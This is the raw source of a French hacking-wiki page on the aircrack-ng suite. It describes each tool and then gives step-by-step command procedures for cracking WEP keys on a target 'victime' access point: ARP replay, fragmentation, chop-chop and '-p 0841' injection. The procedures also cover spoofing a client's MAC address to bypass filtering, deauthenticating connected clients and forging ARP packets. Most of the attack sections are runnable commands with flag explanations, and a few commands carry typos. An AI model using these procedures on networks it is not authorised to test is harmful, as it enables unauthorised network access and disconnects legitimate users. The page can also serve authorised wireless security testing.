Pork Center
Voir le texte source
Page
Discussion
Voir le texte source
Historique
Rechercher
Navigation
Accueil
Communauté
Modifications récentes
Page au hasard
Chat
Aide
sitesupport
Outils personnels
18.188.40.207
Discussion avec cette adresse IP
Connexion
Boîte à outils
Pages liées
Suivi des pages liées
Pages spéciales
Voir le texte source
De Hack-it.org.
pour
Aircrack-ng
== Les outils de la suite aircrack == === aircrack-ng === Sert à casser une clé WEP ou WPA, depuis la derniere version, il utilise l'algorythme PTW par défaut pour le cassage du WEP. === airbase-ng === Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". Peut aussi être utilisé en mode ad hoc, simule un poste client ad hoc. === airdecap-ng === Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark. === airdecloak-ng === Sert à décloaker (démasquer) les bssid cloakés === airdriver-ng === Sert à compiler, dés/installer les drivers appropriés à votre carte. === aireplay-ng === Sert à injecter des paquets et à s'authentifier auprès des AP. === airmon-ng === Sert à dés/activer le mode monitor sur votre carte. === airodump-ng === Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque. === airserv-ng === Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur. === airolib-ng === Permet de créer une base de données sqlite en vue d'un crack WPA. <br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.''' === airtun-ng === Permet de dé/chiffrer en WEP des donnés, il peut servir à se connecter en mode monitor, faire une capture en live qui ne prend pas les beacon frame (utile pour une analyse wireshark / tcpdump) === buddy-ng === A utiliser avec easside-ng, c'est le serveur auquel se connecte easside-ng === easside-ng === Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé. === ivstools === Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul. === makeivs === Permet de créer un fichier .ivs à partir d'une clé WEP connue. === packetforge-ng === Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection). === tkiptun-ng === Permet d'aider au crack de clés WPA utilisant TKIP. <br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.''' === wesside-ng === Outil permettant l'automatisation du crack de clé WEP. <center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center> == Les drivers WiFi == Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng. * Pour connaitre les drivers supportés: >>> airdriver-ng supported * Pour connaitre les drivers déjà installés: >>> aidriver-ng installed * Pour connaitre les drivers WiFi chargés dans le kernel: >>> airdriver-ng loaded * Pour détecter les cartes WiFi: >>> airdriver-ng detect * Pour décharger un driver inutile: >>> airdriver-ng unload $num_driver * Pour compiler un driver: Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper: <br />>>> airdriver-ng compile $num_driver * Pour installer un driver fraichement compilé: >>> airdriver-ng install $num_driver * Pour charger un driver dans le kernel: >>> airdriver-ng load $num_driver * Pour avoir des détails sur un driver: >>> airdriver-ng details $num_driver == Les différents types d'attaques == Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte. === Légende === $iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre) <br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng) <br />$bssid_cible = BSSID du point d'acces ciblé <br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué) <br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing) <br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng) === Mac spoofing === Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte: <br />>>> ifconfig $iface down <br />>>>macchanger --mac $mac_client $iface === Méthode "ARP replay" === '''Méthode avec client et sans filtrage MAC''' * Mettre carte en monitor: >>> ifconfig $iface down <br />>>> airmon-ng start $iface * Trouver une victime: >>> airodump-ng $iface <br />''Couper une fois la victime trouvée'' * Lancer la capture d'IVs: >>> airodump-ng -c $canal -w $fichier_capture $iface <br />-w = préfixe à utiliser pour le nom du fichier de capture <br />''Laisser tourner...'' * Associer la carte à l'AP: >>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface <br />-1 = fake association <br />30 = temps d'attente entre 2 tentatives <br />''En cas de succes, "Association successful :-)" doit s'afficher'' * Lancer l'injection: >>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface <br />-3 = attaque ARP replay <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente'' * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: >>> aircrack-ng $fichier_capture <br />''CRACKED !!!'' === Methode "chop-chop" et "par fragmentation" === '''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' * Mettre la carte en monitor: >>> ifconfig $iface <br />>>> airmon-ng start $iface * Trouver une victime: >>> airodum-ng $iface <br />''Couper une fois la victime trouvée'' * Lancer la capture d'IVs: >>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface <br />-w = préfice à utiliser pour le nom du fichier de capture <br />''Laisser tourner...'' * Associer la carte à l'AP: >>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface <br />-1 = fake association <br />0 = temps d'attente (en ms) entre 2 tentatives <br />''En cas de succes, "Association successful :-)" doit s'afficher'' ** En cas d'échec: >>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface <br />6000 = temps d'attente (en ms) entre 2 tentatives <br />-o = nombre de jeux de paquets à envoyer à la fois <br />-q = intervale entre 2 paquets "keep-alive" ** En cas de filtrage MAC: >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface <br />-0 = déauthentification <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' * Attaque: Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop. <br />Dans les 2 cas, un fichier .xor sera créé en cas de succès. ** Par fragmentation: >>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface <br />-5 = attaque par fragmentation ** Chop-chop: >>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface <br />-4 = attaque chop-chop * Création d'un paquet ARP: >>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp <br />-0 = générer un paquet ARP <br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255) <br />-l = IP source (la plupart des AP répondent au 255.255.255.255) <br />-w = nom du fichier dans lequel mettre le paquet ARP * Injection de l'ARP: >>> aireplay-ng -2 -r $fichier_arp $iface <br />-2 = selection de paquets interactive (accepter le paquet avec "y") <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant'' * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: >>> aircrack-ng $fichier_capture <br />''CRACKED'' === Méthode "-p 0841" === '''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' * Mettre la carte en mode monitor: >>> ifconfig $iface down >>> airmon-ng start $iface * Trouver une victime: >>> airodump-ng $iface <br />''Couper une fois la victime trouvée'' * Lancer la capture d'IVs: >>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface <br />-w = préfixe à utiliser pour le nom du fichier de capture <br />''Laisser tourner...'' * Associer la carte à la station: >>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface <br />-1 = fake association <br />0 = temps d'attente (en ms) entre 2 tentatives <br />''En cas de succès, "Association successful :-)" doit s'afficher ** En cas d'échec: >>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface <br />6000 = temps d'attente (en ms) entre 2 tentatives <br />-o = nombre de jeux de paquets à envoyer à la fois <br />-q = intervale entre 2 paquets "keep-alive" ** En cas de filtrage MAC: >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface <br />-0 = déauthentification <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' * Lancer l'injection: >>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface <br />-2 = sélection de paquets interactive (accepter le paquet avec "y") <br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant'' * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: >>> aircrack-ng $fichier_capture <br />''CRACKED''
Revenir à la page
Aircrack-ng
.